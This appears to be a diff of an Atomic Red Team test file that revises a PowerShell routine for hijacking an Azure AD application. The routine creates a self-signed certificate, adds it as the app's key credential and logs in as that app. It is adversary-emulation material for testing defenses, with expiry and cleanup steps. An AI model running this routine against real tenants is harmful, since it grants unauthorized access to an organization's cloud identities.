dependency_executor_name: powershell
dependencies:
- description: |
@@ -134,21 +114,18 @@ atomic_tests:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: |
@@ -166,7 +143,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
- rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key